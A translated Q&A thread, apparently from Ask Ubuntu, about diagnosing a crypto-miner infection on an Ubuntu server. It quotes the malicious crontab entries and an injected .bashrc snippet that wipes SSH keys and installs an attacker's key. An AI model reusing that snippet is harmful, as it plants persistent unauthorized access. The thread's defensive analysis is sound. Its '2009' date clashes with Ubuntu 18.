Странное задание Cron занимает 100% ресурсов процессора Ubuntu 18 LTS Server

21

Я продолжаю получать рабочие места, и я понятия не имею, что они делают. Обычно я запускаю kill -9, чтобы остановить их. Они занимают 100% моего процессора и могут работать в течение нескольких дней, пока я не проверю. Кто-нибудь знает что это значит?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Я использую сервер Ubuntu 18 LTS, полностью обновленный по состоянию на вчерашний день 24.07.2009

ОБНОВИТЬ

Я ценю все отзывы. Я отключил все диски с данными и приложениями, так как единственное, на что это повлияло, это диск с ОС, по крайней мере, я так поступил правильно. Я иду с полной перестройкой, с гораздо большей безопасностью и более безопасными методами.

server cron rsync MCP_infiltrator
источник
8
.firefoxcatcheвероятно, не имеет ничего общего с Firefox - это может быть просто биткойн-майнер? Попробуйте загрузить исполняемые файлы в virustotal.
Том Виггерс
1
Файлы, которыми управляет этот crontab, - /root/.firefoxcatche/a/updи/root/.firefoxcatche/b/sync
Том Виггерс
2
«Я не могу найти crontab для хэша», что это значит? почему бы sudo crontab -eредактировать не работать? Но если это криптоминер, который вы не установили ... они будут добавлены заново. 1-й взгляд в "/root/.firefoxcatche/a/upd", что он делает.
Rinzwind
2
«Нужно ли входить в систему как root, чтобы попасть туда?» Это вопрос, который я не ожидаю увидеть от администратора. Вам действительно нужно знать, что вы делаете с этого момента. Изменить пароль администратора как можно скорее. Проверьте файлы, перечисленные в cron. Искоренить их.
Rinzwind
1
но это так просто ;-) Я поддерживаю более 10 экземпляров Google Cloud. С планом на случай непредвиденных обстоятельств я могу представить, что что-то пошло не так. Если что-то подобное произойдет, я уничтожу корневой экземпляр, создам новый, отсканирую диск данных на наличие клона, отсканирую различия и затем прикреплю его к экземпляру. и осуществите что-то, чтобы поймать этого человека в ловушку, чтобы предотвратить это В моем случае моя зарплата зависит от этого ;-)
Rinzwind

Ответы:

40

Ваша машина, скорее всего, заражена крипто-майнером. Вы можете увидеть, как кто-то другой сообщает о похожих именах файлов и поведении при реальном обнаружении виртуальной машины в Azure с помощью Центра безопасности . См. Также Мой сервер Ubuntu содержит вирус ... Я обнаружил его, но не могу избавиться от него ... в Reddit.

Вы больше не можете доверять этой машине и должны переустановить ее. Будьте осторожны с восстановлением резервных копий.

Том Виггерс
источник
8
Я согласен. пароль root был взломан, поэтому переустановите его и будьте очень осторожны с резервной копией; это также может быть там.
Ринзвинд
9

Ваша машина была заражена атакой крипто-майнера. Я также сталкивался с подобной атакой вымогателей в прошлом, и моя база данных была взломана. Я взял дамп SQL для машины и заново подготовил ее (поскольку моя машина была виртуальной машиной, размещенной на AWS EC2). Я также изменил группы безопасности машины, чтобы заблокировать доступ по SSH и изменить пароли. Я также включил ведение журнала, чтобы регистрировать запросы и экспортировать его в S3 каждую ночь.

beingadityak
источник
4

То же самое случилось со мной, и я заметил вчера. Я проверил файл, /var/log/syslogи этот IP (185.234.218.40), по-видимому, автоматически выполнял cronjobs.

Я проверил это на http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ), и у него есть несколько отчетов. Эти файлы были отредактированы трояном:

  • .bashrc
  • .ssh / authorized_keys

Я нашел это в конце .bashrc(который выполняется каждый раз, когда открывается bash):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Это удаление вашего authorized_keysфайла, представляющего собой список ключей SSH, которым разрешено подключаться без пароля. Затем он добавляет ключ SSH атакующего:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Кроме того, я нашел эту папку:, /tmp/.X13-unix/.rsyncгде находится все вредоносное ПО. Я даже нашел файл, /tmp/.X13-unix/.rsync/c/ipфайл, содержащий 70 000 IP-адресов, которые, скорее всего, являются другими жертвами или серверами узлов.

Есть 2 решения: A:

  • Добавьте брандмауэр, блокирующий все исходящие соединения, кроме порта 22 и других, которые вы считаете необходимыми, и включите fail2ban, программу, которая блокирует IP-адрес после X неудачных попыток ввода пароля.

  • Убить все задания cron:, ps aux | grep cronзатем убить PID, который появляется

  • Измените свой пароль на безопасный

B:

  • Сделайте резервную копию любых файлов или папок, которые вам нужны или которые вы хотите

  • Перезагрузите сервер и переустановите Ubuntu или создайте новую каплю напрямую.

    Как сказал Том Виггерс, вы, безусловно, являетесь частью бот-сети по майнингу биткойнов, и у вашего сервера есть черный ход . Бэкдор использует эксплойт Perl, файл, расположенный здесь:, /tmp/.X13-unix/.rsync/b/runсодержащий это ( https://pastebin.com/ceP2jsUy )

Самые подозрительные папки, которые я нашел, были:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (который был отредактирован)

  • ~/.firefoxcatche

Наконец, есть статья, относящаяся к бэкдору Perl: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Я надеюсь, что вы найдете это полезным.

Oqhax
источник
Я вытер диск os и переустановил Ubuntu, создал новый довольно длинный пароль и новые ключи ssh
MCP_infiltrator
Да, это хорошее решение :)
Oqhax
Это был очень полезный ответ - спасибо, что поймали тот факт, что ~/.bashrcбыл отредактирован. Я обнаружил, что, чтобы убить поддельного, rsyncя должен был выдать kill -9 <pid>.
Бенни Хилл